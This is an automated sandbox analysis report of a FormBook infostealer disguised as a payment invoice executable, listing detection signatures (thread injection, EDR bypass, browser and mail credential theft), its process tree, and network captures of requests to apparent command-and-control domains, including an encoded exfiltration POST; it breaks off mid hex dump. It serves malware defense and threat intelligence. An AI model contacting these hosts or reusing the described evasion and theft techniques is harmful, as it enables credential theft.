Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Due Payment Invoice PISS2024993.exe

Overview

General Information

Sample name:Due Payment Invoice PISS2024993.exe
Analysis ID:1541207
MD5:e36a9532eb81c28dd0ed418c61774138
SHA1:63842c24e62c29a7695134da51e6cfa7654ce2d4
SHA256:5bf41f92b016c6c045f3b10573788b4c7cc6b11e20b2a57ae5d4943c1b160da4
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Due Payment Invoice PISS2024993.exe (PID: 1732 cmdline: "C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe" MD5: E36A9532EB81C28DD0ED418C61774138)
    • RegSvcs.exe (PID: 6564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cJjnESPXORw.exe (PID: 3648 cmdline: "C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xcopy.exe (PID: 6784 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)
          • firefox.exe (PID: 4816 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3912564101.0000000002BE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.2420013773.0000000000F50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.3912510675.0000000002B90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xcopy.exe", CommandLine: "C:\Windows\SysWOW64\xcopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: "C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe" , ParentImage: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe, ParentProcessId: 3648, ParentProcessName: cJjnESPXORw.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xcopy.exe", ProcessId: 6784, ProcessName: xcopy.exe
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Due Payment Invoice PISS2024993.exeReversingLabs: Detection: 34%
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3912564101.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2420013773.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3912510675.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3912731474.0000000003070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2421355928.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Due Payment Invoice PISS2024993.exeJoe Sandbox ML: detected
                Source: Due Payment Invoice PISS2024993.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Due Payment Invoice PISS2024993.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: xcopy.pdbUGP source: RegSvcs.exe, 00000003.00000002.2419859326.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000003.2491694752.0000000000B18000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: IaWe.pdb source: Due Payment Invoice PISS2024993.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cJjnESPXORw.exe, 00000005.00000002.3911462074.000000000009E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2419783426.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2422109688.0000000002E0C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: IaWe.pdbSHA256J source: Due Payment Invoice PISS2024993.exe
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000006.00000003.2419783426.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2422109688.0000000002E0C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: xcopy.pdb source: RegSvcs.exe, 00000003.00000002.2419859326.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000003.2491694752.0000000000B18000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0281C420 FindFirstFileW,FindNextFileW,FindClose,6_2_0281C420
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 4x nop then jmp 01820538h0_2_018206C2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 4x nop then xor eax, eax6_2_02809D90
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 4x nop then pop edi6_2_02822540
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 4x nop then mov ebx, 00000004h6_2_02E004DE
                Source: Joe Sandbox ViewIP Address: 141.193.213.11 141.193.213.11
                Source: Joe Sandbox ViewIP Address: 141.193.213.11 141.193.213.11
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /qq33/?pZxtux=i6Dk+UJVjxglEXs09Tl/1hzZ7yI7sWOV9FpOihhS4ziFAzHmIjfzFnYav8OQcpUvdMfWm2GXI1cxWM9gtNVnhTwiButew2EOfjMP80SRQHDkyyZg6sD1yMmsAnC5II4onw==&C6=EXkTb HTTP/1.1Host: www.ila.beautyAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ow7i/?pZxtux=D6NwXqVIZVbqudPbukfKSXslB0cDplrj7EaXwER037qfX6kPuWmDYfQvQA/Ze+QTmkPK0wpsgEVRbQCYLV+GBPPQtbW1nqz4pZ5COE7r30blXJdgErW3TYP6jwHTnZcx3A==&C6=EXkTb HTTP/1.1Host: www.shintow.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mdol/?pZxtux=IBR/N437Xoj/lvQ/yaypF1iCxq0JhxtvQ9XvO2IN6lbwsaKUqIYSoc7J5DfSIcjVFUNu75pY4qnkQs5YcPPLlBdqXD3XopUqxrOy0G+yXtR7yOmR4k+PDTzACkBBVYCXxA==&C6=EXkTb HTTP/1.1Host: www.mireela.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /uao9/?pZxtux=gsMVmNPJ8N9SSsJhvzgfzwwjqe07CXl0sVKqNnzNMDh6tN9OUV5g1ZhKr/MfkgGiHAPXbKUUpWb7OZdwItOAW4YYmA3iTr55JhOSegfIcMD9E8fUPg/eNtps2xYGlBIlpg==&C6=EXkTb HTTP/1.1Host: www.micrhyms.infoAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg8oxocmzQgcw2k7hIxSEQ8Yn0gG/bTm5M3gQ9SHUsYy5BmA== HTTP/1.1Host: www.estrela-b.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /zdt7/?pZxtux=OdyTsfpKOp+FbfSBk3rtAPX6yl42tFHs0o0DPQC5l8EmE472eTQ0FDkunmNaJXsoU4tZbjlt6ORfso7icAjAvSN+KGdO51cWhvQZ2fU2V4w5zpyWN4cvAtWl9PkRGGXA+g==&C6=EXkTb HTTP/1.1Host: www.meanttobebroken.orgAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /t2sm/?pZxtux=94IeUqPLX3ZZBpOBWJjj6w05jpTx/xHCK3bXujG3CQTlZUuHvWSdywBNDw0UN7LA9SFuNcoJQf79ZomCfHkQBPJfdTEUnKSwwNjbiieOsGOn8kHnIz1RgyTaVPNwwy1Row==&C6=EXkTb HTTP/1.1Host: www.mjmegartravel.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /24sh/?pZxtux=M41UUGwRPTDcYYp7NjzFchXqTu9ohCG2hnX9QOYTWHvuC0V13uvlBW/8MUrXzawQyQAEaeslrtJdAUXUhjCRxVhWrTu2Hm15Y+EHLS69Aj11G8IhKuKDs0JHRlg0rr8yhA==&C6=EXkTb HTTP/1.1Host: www.energyparks.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /df5c/?pZxtux=iTGQ2f3/8wLaRYQP0xZx681X5jLmVFU/oLVVEoegdR+OVsnqcEQj6iurR8BAvDospkEZVkGP6nTG7c6sAiwUrDOAfXxLGlgGaAd3CytgAtbKInIGuq2UlXDJcOT7zCeYfw==&C6=EXkTb HTTP/1.1Host: www.theawareness.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /o5z9/?pZxtux=z11/8LNw/ilOmRo5iVplmq9QJ2/sY6O9S3jiPj8IKRvMXjps+f+3QxK4x8TDiA3fpLYwxgH4NhA45modVvBwao6NdyacUH38gYwDUqZfGQ230ajUqn4GEmUCWVLyRw7Now==&C6=EXkTb HTTP/1.1Host: www.ak711ka10.latAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.ila.beauty
                Source: global trafficDNS traffic detected: DNS query: www.shintow.net
                Source: global trafficDNS traffic detected: DNS query: www.mireela.pro
                Source: global trafficDNS traffic detected: DNS query: www.micrhyms.info
                Source: global trafficDNS traffic detected: DNS query: www.estrela-b.online
                Source: global trafficDNS traffic detected: DNS query: www.meanttobebroken.org
                Source: global trafficDNS traffic detected: DNS query: www.mjmegartravel.online
                Source: global trafficDNS traffic detected: DNS query: www.energyparks.net
                Source: global trafficDNS traffic detected: DNS query: www.theawareness.shop
                Source: global trafficDNS traffic detected: DNS query: www.ak711ka10.lat
                Source: unknownHTTP traffic detected: POST /ow7i/ HTTP/1.1Host: www.shintow.netAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.shintow.netReferer: http://www.shintow.net/ow7i/Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 207Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 70 5a 78 74 75 78 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 63 33 30 6e 55 61 59 65 6e 52 4e 4b 6e 38 2f 72 58 6d 64 35 67 6d 65 70 45 4a 34 33 71 6d 64 4f 4b 63 2f 6d 30 43 4c 41 63 6b 69 53 56 75 50 41 2b 52 32 67 42 4b 2b 70 6c 64 6c 75 6e 78 52 43 58 57 66 48 52 6e 31 51 4f 75 46 37 76 6d 47 6b 61 75 4c 70 61 74 52 66 48 75 4d 31 58 62 6b 53 34 68 62 4b 36 69 6f 44 4c 48 73 39 78 71 64 67 4c 64 42 7a 4c 5a 46 5a 51 63 42 5a 63 54 4e 65 31 49 2f 70 6a 39 50 67 41 71 38 53 34 71 72 36 6a 68 46 47 2f 46 33 58 45 6b 5a 77 4c 4d 64 51 2b 51 31 63 47 35 61 52 72 57 52 34 64 50 2f 4a 54 35 31 45 62 44 71 44 50 41 3d Data Ascii: pZxtux=O4lQUcptNkK6uc30nUaYenRNKn8/rXmd5gmepEJ43qmdOKc/m0CLAckiSVuPA+R2gBK+pldlunxRCXWfHRn1QOuF7vmGkauLpatRfHuM1XbkS4hbK6ioDLHs9xqdgLdBzLZFZQcBZcTNe1I/pj9PgAq8S4qr6jhFG/F3XEkZwLMdQ+Q1cG5aRrWR4dP/JT51EbDqDPA=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:30:11 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:30:14 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:30:16 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 